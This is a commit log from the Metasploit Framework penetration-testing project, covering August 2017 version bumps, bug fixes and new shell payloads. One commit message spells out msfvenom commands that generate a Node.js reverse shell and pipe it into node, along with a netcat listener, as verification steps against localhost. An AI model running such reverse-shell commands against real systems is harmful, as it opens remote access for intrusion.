William Vu b797e96a19 Remove nil check because blank? handles it
The check used to be session_name.strip.empty?, but I forgot to remove
the nil case when I converted to blank?.
2017-08-25 14:11:59 -05:00
Metasploit 779b25bdf6
Bump version of framework to 4.16.3 2017-08-25 10:02:45 -07:00
William Webb 093bc53f97
Land #8875, Fix UDP scanner mixin with multicast addresses 2017-08-25 02:44:29 -05:00
Adam Cammack bd94a46c70
Land #8884, Fix logic for on_session callbacks 2017-08-24 17:24:56 -05:00
Metasploit 2f72404b26
Bump version of framework to 4.16.2 2017-08-23 19:11:11 -07:00
Brent Cook d3775c3919 fix logic for calling on_session callbacks 2017-08-23 18:41:50 -05:00
Jeffrey Martin cba4d36df2
provide missing bits for R platform 2017-08-23 16:58:48 -05:00
Metasploit 7c2fa20191
Bump version of framework to 4.16.1 2017-08-23 10:36:19 -07:00
William Vu 100afaf251 Add ./ to cmd_use for paths and simplify cases
Don't accommodate typos.
2017-08-23 10:24:37 -05:00
Brent Cook 41eba74ddf prefer Addrinfo over ipaddress gem 2017-08-22 23:03:45 -05:00
Brent Cook 17aef43bb8 Fix UDP scanner mixin with multicast addresses
This fixes #8828 by only binding UDP sockets when we have unicast
targets. If we have multicast, prefer unbound sockets.

This also brings in the 'ipaddress' gem for identifying multicast
addresses. It looks like it could replace a lot of custom-built
functionality in rex-socket, including RangeWalker. Will need to see how
efficient it is.
2017-08-22 06:44:43 -05:00
Brent Cook 29c48f9d8d cleanup accounts post API 2017-08-21 23:00:57 -05:00
Brent Cook e3a9ddfc22 fix retry case for acquiring security descriptor 2017-08-21 22:52:53 -05:00
Brent Cook 0d17e94f54 handle unmapped sids consistently 2017-08-21 22:36:26 -05:00
Brent Cook c14daf3fcc
Land #8857, Reverse and bind shells in R 2017-08-21 15:49:24 -05:00
Brent Cook 605330faf6
Land #8842, add linux/aarch64/shell_reverse_tcp 2017-08-21 15:44:28 -05:00
William Vu 8876919f38 Fix typo s/rport/port/ in build_brute_message
I missed this in #7202.
2017-08-21 12:32:41 -05:00
Brent Cook 429824b5c9 guid is hex values 2017-08-21 03:44:02 -05:00
Brent Cook 8700a36858 make session_guid default with the correct length 2017-08-21 03:24:37 -05:00
Brent Cook f961495860
Land #8625, Remove OpenSSL from Windows Meterp, packet header changes, and TLV packet encryption 2017-08-20 19:13:51 -05:00
Metasploit ca7d481658
Bump version of framework to 4.16.0 2017-08-20 16:57:48 -07:00
Brent Cook 5e8c2200ac Merge branch 'master' into land-8625-crypttlv2 2017-08-20 18:54:51 -05:00
Brent Cook f7dc831e9a
Land #8799, Add module to detect Docker, LXC, and systemd-nspawn containers 2017-08-20 14:45:57 -05:00
Brent Cook 6afd90b7f0
Land #8848, fix extra sleep on linux x86 stager 2017-08-19 22:12:19 -05:00
RageLtMan 0145fc3972 payload/r.rb and UUID update 2017-08-19 06:43:28 -04:00
Metasploit 95824ce132
Bump version of framework to 4.15.8 2017-08-18 10:03:23 -07:00
h00die dc358dd087 unknow to unknown 2017-08-18 11:33:48 -04:00
tkmru 74f89857d8 fix extra sleep on linux x86 stager 2017-08-18 15:20:35 +09:00
Tim 8b4ccc66c7 add linux/aarch64/shell_reverse_tcp 2017-08-17 18:55:37 +08:00
William Vu 5b7785438f Add session naming support to CommandDispatcher 2017-08-16 18:18:49 -05:00
William Vu 6eae3b3d4e Add session name output to ReadableText 2017-08-16 18:14:56 -05:00
OJ fa292dce96
Fix issue with truncated values when unpacking packets 2017-08-16 11:01:54 +10:00
Brent Cook 70a82b5c67
Land #8834, add resiliency to x64 linux reverse_tcp stagers 2017-08-15 08:04:32 -04:00
Brent Cook debbc31142 use separate module names for x86 and x64 generators 2017-08-15 08:02:01 -04:00
tkmru db2e3f2ddd add retry to linux reverse tcp x64 2017-08-15 12:49:29 +09:00
Brent Cook 69c4ae99a7
Land #8811, fix peer printing with bruteforce modules 2017-08-14 17:31:48 -04:00
William Vu 1a4db844c0 Refactor build_brute_message for legacy printing 2017-08-14 11:17:34 -05:00
Brent Cook 59086af261
Land #8771, rewrite linux x64 stagers with Metasm 2017-08-14 02:32:29 -04:00
Brent Cook 0ab6dd46d3
Land #8762, add initial Rex FTP protocol implementation 2017-08-14 01:59:53 -04:00
Brent Cook 26193216d1
Land #8686, add 'download' and simplified URI request methods to http client mixin
Updated PDF author metadata downloader to support the new methods.
2017-08-14 01:40:17 -04:00
Brent Cook 5d05ca154a added http client 'download' method and updates to pdf author module from @bcoles 2017-08-14 01:08:53 -04:00
Patrick Thomas 437fe4b63a handle missing util.pump in nodejs shell payloads
Modern NodeJS (since 5.3.0) has removed util.pump in favor of stream.pipe. 

On current versions the nodejs tcp shell payloads error out:
```
$ node --version
v7.10.0
$ msfvenom -p nodejs/shell_reverse_tcp LHOST=127.0.0.1 LPORT=7777 | node
<snip>
TypeError: util.pump is not a function
    at Socket.<anonymous> ([stdin]:1:405)
    at Object.onceWrapper (events.js:293:19)
    at emitNone (events.js:86:13)
    at Socket.emit (events.js:188:7)
    at TCPConnectWrap.afterConnect [as oncomplete] (net.js:1080:10)
```

With this change, bind and reverse tcp should be tolerant of both new and older versions.

*Reference*
https://github.com/nodejs/node/pull/2531

*Verification steps*

1. Set up a handler (either exploit/multi/handler or simple nc)
```
$ nc -l -v 7777
```

2. Use patched version with various versions of node:
```
msfvenom -p nodejs/shell_reverse_tcp LHOST=127.0.0.1 LPORT=7777 | node
```

3. Confirm both old and new versions of node result in shell, not error.
2017-08-12 20:40:03 -07:00
Metasploit be926e1d75
Bump version of framework to 4.15.7 2017-08-11 10:12:37 -07:00